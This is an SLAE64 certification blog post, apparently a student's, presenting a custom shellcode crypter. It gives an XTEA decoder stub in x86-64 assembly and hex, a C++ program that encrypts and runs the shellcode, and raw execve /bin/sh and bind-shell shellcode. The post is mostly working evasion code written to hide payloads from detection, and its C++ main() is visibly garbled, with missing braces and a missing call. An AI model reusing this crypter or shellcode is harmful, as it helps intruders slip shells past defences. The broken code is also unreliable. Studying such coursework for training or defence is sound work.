SLAE Assignment 7 - Custom Shellcode Crypter
This is the last assignment for the SLAE 64bits exam.
The goal of this assignment is to create a custom shellcode crypter.
We are allowed to use any existing encryption scheme and any programming language.
All the source code for this assignment can be found on my github repository
I’ve chosen to implement XTEA, a block cipher, because its decryption routine seemed short enough to write as an assembly stub.
The following program encrypts the payload (it can also decrypt it if you uncomment and call the decipher function), executes the result, and dumps the stub together with the encrypted payload.
The payload is easily configurable (but payloads longer than 255 bytes may require small modifications).
A new key is generated each time, using a poor random generator.
The encoded payload can be up to 7 bytes longer than original payload.
The key and the encoded payload can both contain null bytes (this can be avoided by testing the output and regenerating the key until no null byte remains).
First, the decoder stub source code (without the appended encoded payload and key):
; XTEA decoder stub (x86-64, position independent).
; Layout at run time: [stub: 101 bytes][encoded payload][16-byte key].
; Each pair of 32-bit blocks is decrypted in place with 64 XTEA rounds, then
; execution falls through into the decoded payload.
_start:
    lea rsi, [rel _start]           ; get memory address of this instruction
    add rsi, 101                    ; point to memory address of encoded payload (base + stub length without the key)
    lea r11, [rsi + 24]             ; point to the key (rsi + payload size)
    push 3                          ; nb of blocks pairs
    pop rcx
next_blocks:
    push rcx                        ; save actual block pair number on stack
    mov r10, 0x8dde6e40             ; init sum (delta * 64 rounds, modulo 2^32)
    push rsi                        ; backup encoded payload base address
    lodsd                           ; load first block in eax
    xchg eax, ebx                   ; copy it into ebx
    lodsd                           ; load second block
    xchg eax, ebx                   ; exchange first and second block (eax = v0, ebx = v1)
    push 64                         ; set number of iteration
    pop rcx
decipher_loop:
    push rcx                        ; save the round counter
    mov cl, 3                       ; sub-step counter telling whether we are in the v1 -= ... or the v0 -= ... half,
                                    ; because they are slightly different (sum >> 11)
internal:
    push rax                        ; push value of the current block (vx) for later use
    push rax
    mov edx, eax
    shl eax, 4                      ; vx << 4
    shr edx, 5                      ; vx >> 5
    xor eax, edx                    ; (vx << 4) ^ (vx >> 5)
    pop rdx
    add edx, eax                    ; ((vx << 4) ^ (vx >> 5)) + vx
    push r10
    pop rax                         ; eax = sum
    dec ecx
    je v0                           ; second half (v0 -= ...): the key index is sum & 3, so skip the shift
    shr eax, 11                     ; sum >> 11
v0:
    and eax, 3                      ; sum & 3
    mov dword eax, [r11 + 4*rax]    ; key[sum&3]
    add eax, r10d                   ; sum + key[sum&3]
    xor eax, edx                    ; () ^ ()
    sub ebx, eax                    ; vx -= () ^ ()
    pop rax                         ; vx
    dec ecx
    js next                         ; if signed then we are ending (v0 -=...) part so we jump to the next iteration
    sub r10d, 0x9E3779B9            ; sum -= delta
    xchg eax, ebx                   ; exchange v1 and v0 value
    jmp internal                    ; jump to start v0 -= part
next:
    pop rcx                         ; set to iteration counter
    xchg eax, ebx                   ; exchange v0 and v1
    loopnz decipher_loop
    pop rdi                         ; get base memory address of encoded payload (of first block not decoded)
    stosd                           ; replace encoded block with its decoded version
    xchg eax, ebx                   ; set v1 in eax
    stosd                           ; replace second decoded block
    pop rcx                         ; get blocks pair counter
    loopnz next_blocks              ; if there are other encoded pair jump else execute decoded payload
    ; Encoded payload + key, will be appended here.
Then I’ve extracted the hexadecimal code and inserted it into the following c++ code :
#include <string>
#include <vector>
#include <cstdint>
#include <ctime>
#include <cstdlib>
#include <iostream>
#include <iomanip>
#include <cstring>
using namespace std;
// Exec shell payload
// 23 bytes of x86-64 machine code: xor esi, esi; mul esi; push rax;
// mov rdi, "/bin//sh"; push rdi; mov rdi, rsp; mov al, 0x3b; syscall
string payload = "\x31\xf6\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05";
// Bind shell with pass from Assignment 1 (port 1337, pass L33tP4ss)
// Used to test the modification of the number of blocks pairs and of the encoded shellcode size
//string payload = "\x31\xff\xf7\xe7\xff\xc7\x89\xfe\xff\xc7\xb0\x29\x0f\x05\x89\xd3\x52\x66\x68\x05\x39\x66\x57\x89\xc7\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x89\xde\xb0\x32\x0f\x05\x99\xb0\x2b\x0f\x05\x97\x48\x89\xe6\xb2\x08\x89\xd8\x0f\x05\x48\x87\xfe\x48\xb8\x4c\x33\x33\x74\x50\x34\x73\x73\x48\xaf\x48\x87\xfe\x75\xe3\x89\xde\x31\xc0\x83\xc6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\xb0\x3b\x53\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x89\xde\x99\x0f\x05";
// XTea decoder stub
// Machine code of the assembly decoder (101 bytes). Two bytes are patched by
// main() before the stub is emitted:
//   stub[14] : 8-bit displacement of `lea r11, [rsi + 24]` (encoded payload size)
//   stub[16] : 8-bit immediate of `push 3` (number of block pairs)
string stub = "\x48\x8d\x35\xf9\xff\xff\xff\x48\x83\xc6\x65\x4c\x8d\x5e\x18\x6a\x03\x59\x51\x41\xba\x40\x6e\xde\x8d\x56\xad\x93\xad\x93\x6a\x40\x59\x51\xb1\x03\x50\x50\x89\xc2\xc1\xe0\x04\xc1\xea\x05\x31\xd0\x5a\x01\xc2\x41\x52\x58\xff\xc9\x74\x03\xc1\xe8\x0b\x83\xe0\x03\x41\x8b\x04\x83\x44\x01\xd0\x31\xd0\x29\xc3\x58\xff\xc9\x78\x0a\x41\x81\xea\xb9\x79\x37\x9e\x93\xeb\xca\x59\x93\xe0\xc3\x5f\xab\x93\xab\x59\xe0\xad";
// Copy paste from :
/// Encrypts one 64-bit block in place with XTEA.
///
/// @param num_rounds number of XTEA cycles; each cycle updates v[0] and then v[1].
/// @param v          the block as two 32-bit words; overwritten with the ciphertext.
/// @param key        the 128-bit key as four 32-bit words.
void encipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    const uint32_t delta = 0x9E3779B9;
    uint32_t v0 = v[0];
    uint32_t v1 = v[1];
    uint32_t sum = 0;
    for (unsigned int i = 0; i < num_rounds; i++) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += delta;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}
// Copy paste from :
// Used to test before writing an asm x64 implementation
/// Decrypts one 64-bit block in place with XTEA (inverse of encipher).
///
/// @param num_rounds number of XTEA cycles; must match the value used to encrypt.
/// @param v          the ciphertext as two 32-bit words; overwritten with the plaintext.
/// @param key        the 128-bit key as four 32-bit words.
void decipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    const uint32_t delta = 0x9E3779B9;
    uint32_t v0 = v[0];
    uint32_t v1 = v[1];
    // Start from the final value reached by the encryption sum (wraps modulo 2^32).
    uint32_t sum = delta * num_rounds;
    for (unsigned int i = 0; i < num_rounds; i++) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}
// Return a vector of blocks from the string passed in parameter
/// Splits a byte string into 32-bit blocks.
///
/// The string is zero-padded up to a multiple of 4 bytes, then each group of
/// 4 bytes is packed with its first byte in the least significant position
/// (the same value the decoder stub reads with `lodsd`).
///
/// @param s raw bytes to split (taken by value because it is padded locally).
/// @return one uint32_t per 4-byte group; empty when s is empty.
std::vector<uint32_t> getblocks (std::string s) {
    const std::size_t nbblock = (s.size() + 3) / 4;
    s.resize(nbblock * 4);  // pads with '\0'

    std::vector<uint32_t> lstblocks;
    lstblocks.reserve(nbblock);
    for (std::size_t i = 0; i < s.size(); i += 4) {
        uint32_t word = 0;
        for (std::size_t j = 0; j < 4; ++j) {
            // Widen to uint32_t before shifting so a byte >= 0x80 never
            // shifts into the sign bit of a promoted int.
            const uint32_t byte = static_cast<unsigned char>(s[i + j]);
            word |= byte << (8 * j);
        }
        lstblocks.push_back(word);
    }
    return lstblocks;
}
// Generate the 4 uint32_t to compose the Key
/// Returns the 128-bit XTEA key as four 32-bit words.
///
/// The key lives in a function-local static array that is filled from rand()
/// on the first call only, so every call returns the same pointer and the
/// same key. Each word is limited to the range of rand() (0..RAND_MAX).
///
/// @return pointer to the 4-word key; the storage is owned by this function.
uint32_t * generatekey() {
    static uint32_t key[] = {
        static_cast<uint32_t>(std::rand()),
        static_cast<uint32_t>(std::rand()),
        static_cast<uint32_t>(std::rand()),
        static_cast<uint32_t>(std::rand())
    };
    return key;
}
// Return a string where char of each block are in reverse order and print the hexadecimal value of the string
/// Reverses the byte order inside every 4-byte block of s and prints the
/// result to std::cout as a `\xNN` escaped string followed by a blank line.
///
/// The stream's formatting state (hex base, fill character, ...) is saved on
/// entry and restored on exit so later output is not affected. A trailing
/// block shorter than 4 bytes is reversed over the bytes that exist.
///
/// @param s bytes to convert.
/// @return the byte string with each block reversed.
std::string blocks2hexa(std::string s) {
    std::string buffer;
    buffer.reserve(s.size());

    // Remember how std::cout was configured before switching it to hex.
    std::ios oldState(nullptr);
    oldState.copyfmt(std::cout);

    for (std::size_t i = 0; i < s.size(); i += 4) {
        const std::size_t end = (s.size() - i < 4) ? s.size() : i + 4;
        for (std::size_t j = end; j-- > i; ) {
            const unsigned char byte = static_cast<unsigned char>(s[j]);
            buffer += static_cast<char>(byte);
            std::cout << "\\x" << std::hex << std::setw(2) << std::setfill('0')
                      << static_cast<uint32_t>(byte);
        }
    }
    std::cout << std::endl << std::endl;

    std::cout.copyfmt(oldState);
    return buffer;
}
int main() {
vector<uint32_t> blocks = getblocks(payload);
blocks.resize(blocks.size() + (blocks.size()%2));
uint32_t *key = generatekey();
string encoded = {};
// Encipher the payload block pair by block pair
// And store the result in the encoded string variable
for(int i = 0; i < (blocks.size()-1); i+=2) {
uint32_t currentblocks[2] = {blocks[i], blocks[i+1]};
encipher(64, currentblocks, key);
for(int j = 0; j < 2; j++) {
for(int z = 24; z >=0; z-=8) {
encoded += (unsigned char)((currentblocks[j] >> z) & 0xFF);
// Change the key from 4 uint32_t to a string of 16 char
string strkey = {};
for(int j = 0; j < 4; j++) {
for(int z = 24; z >=0; z-=8) {
strkey += (unsigned char)((key[j] >> z) & 0xFF);
// Set number of blocks pairs and payload size
stub[14] = (unsigned char)(encoded.size()&0xFF);
stub[16] = (unsigned char)((blocks.size()/2)&0xFF);
cout << "Key size : " << strkey.size() << endl;
strkey = blocks2hexa(strkey);
cout << "Encoded payload size : " << encoded.size() << endl;
encoded = blocks2hexa(encoded);
// Append stub + encoded payload + key
stub += encoded;
stub += strkey;
cout << "XTEA Decoder stub + encoded payload + key size: " << stub.size() << endl;
for(int i = 0; i < stub.size(); i++)
cout << "\\x" << hex << setw(2) << setfill('0') << static_cast<uint32_t>((unsigned char)stub[i]);
cout << endl << endl;
// load then execute
char shellcode[sizeof(stub)];
strcpy(shellcode, stub.c_str());
void (* run)() = (void (*)()) shellcode;
After compiling it, we can test it with the execve shellcode :
skrox@kali:~$ g++ -ggdb -m64 -fno-stack-protector -z execstack -o xtea-encoder xtea-encoder.cpp
skrox@kali:~$ ./xtea-encoder
Key size : 16
Encoded payload size : 24
XTEA Decoder stub + encoded payload + key size: 141
$ id
uid=1000(skrox) gid=1000(skrox) groups=1000(skrox)
And this is the end of this assignment and of my SLAE64 posts.
Thank you for reading !
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: PA-14186